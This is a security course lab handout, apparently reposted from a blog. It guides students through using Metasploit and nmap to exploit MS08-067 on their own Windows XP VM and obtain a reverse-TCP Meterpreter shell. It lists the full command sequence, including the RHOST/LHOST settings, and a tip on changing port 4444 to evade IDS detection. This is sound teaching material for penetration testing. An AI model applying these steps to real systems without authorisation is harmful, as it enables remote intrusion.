Unit 4: Exploits and Exploiting 4.3 Activity and Discussion Activity: Using Metasploit

ACTIVITY: USING METASPLOIT

This activity is ungraded.

Remember: Watch this Demo video. Seeing me complete the activity first will help you understand each of the steps.

• Starting Metasploit
• Exploit and Payload Demo

System: During this activity, you’ll use the Kali VM as you did in the packet sniffing exercises in Unit 1. 
Instructions for installing and launching the Kali VM.

Note:

• To complete all of these activities as written, in sequence, you need to have, or acquire, your own copy of Windows XP.
• Just the very last activity requires Windows 7. If you're using the free Microsoft Windows 7 VM (which is limited), some Meterpreter commands from the Meterpreter Activity and Demo Videos will not work. If you're using your own Windows 7 copy, you should be able to replicate everything I did in the demos.

Time: This activity should take you approximately 30 minutes to complete.

Goal

• To use Metasploit to identify and configure an exploit and payload.

Instructions

Start Metasploit

Note: Hit Enter after each command.

1. Start VMware, and launch your Kali VM.
2. Open up a terminal and start the Postgresql Database service: /etc/init.d/postgresql start
3. Create and initialize the Metasploit Framework Database with the command msfdb init
   Note: You’ll only enter this command the first time you go through these steps. Subsequently, use msfdb start to launch Metasploit.
4. Launch a second terminal to run MSF in its own environment with the command msfconsole
5. After a moment, you’ll see the msf prompt.

Select an Exploit

1. Open up Windows XP in your second hypervisor (VirtualBox or Hyper-V). The Windows XP system should be in bridged mode.
   
   Note: Your Windows host machine, your Kali VM, and your Windows XP VM should all be on the same subnet. Make sure they can all ping each other before going forward. If the three machines can’t ping each other, make sure the pings aren’t being blocked by a firewall.
2. In msfconsole, enter nmap -A -v [IP of XP VM]
   -A performs tons of tests on the target IP address, including OS detection, version detection, script scanning, and traceroute.
   -v specifies that we want verbose output.
   
   Notice at the bottom of the output there are lines regarding SMB (Server Message Block) security on the XP system. SMB allows for sharing of files and printers. Also, port 445, for directly hosted SMB over TCP/IP is open.
3. Let’s see all exploits associated with SMB. Enter search smb.
4. To find one of the most famous exploits of all-time, enter search ms08_067_netapi.
5. For more information on this exploit, enter info exploit/windows/smb/ms08_067_netapi.
6. To select this exploit for use, enter use exploit/windows/smb/ms08_067_netapi.
7. You’ll notice that the prompt changes to a specific exploit prompt:
   From msf > use exploit/windows/smb/ms08_067_netapi
   to msf exploit(ms08_067_netapi) >

Configure an Exploit and Payload

Using a payload, you will get the victim machine, your Windows VM, to initiate a TCP connection back to your Kali VM.

1. Enter show payloads to see all available payloads.
2. Enter search windows/meterpreter/reverse_tcp to find a reverse_tcp meterpreter shell.
3. Enter info windows/meterpreter/reverse_tcp for more information on this payload.
4. To select the payload, enter set payload windows/meterpreter/reverse_tcp.
5. Enter show options to configure the exploit. Note the various parameters which are required for the exploit to be launched properly.
6. Enter show targets to see all of the targets this exploit works for.
7. For this activity, keep the default of target 0, automatic targeting.
8. Set the remote host using the IP address of the Windows XP system: set RHOST 192.168.1.105 (remember to change this IP to yours).
9. Set the local host, using the IP address of your Kali box: set LHOST 192.168.1.104.
10. Enter show options to verify your settings.

Note: A hacker could change the local port from 4444 to avoid detection, since many IDSes know about Metasploit’s use of port 4444. You don’t have to do that for this activity.

Enter exploit to enter the XP system. If successful, you’ll see your meterpreter shell!

In the next activities, you will see what you can do on the target machine through this exploit. You should continue working now if you can. If not, you will have to repeat these steps before starting the next activity Meterpreter Commands.

转载于:https://www.cnblogs.com/sec875/articles/10028558.html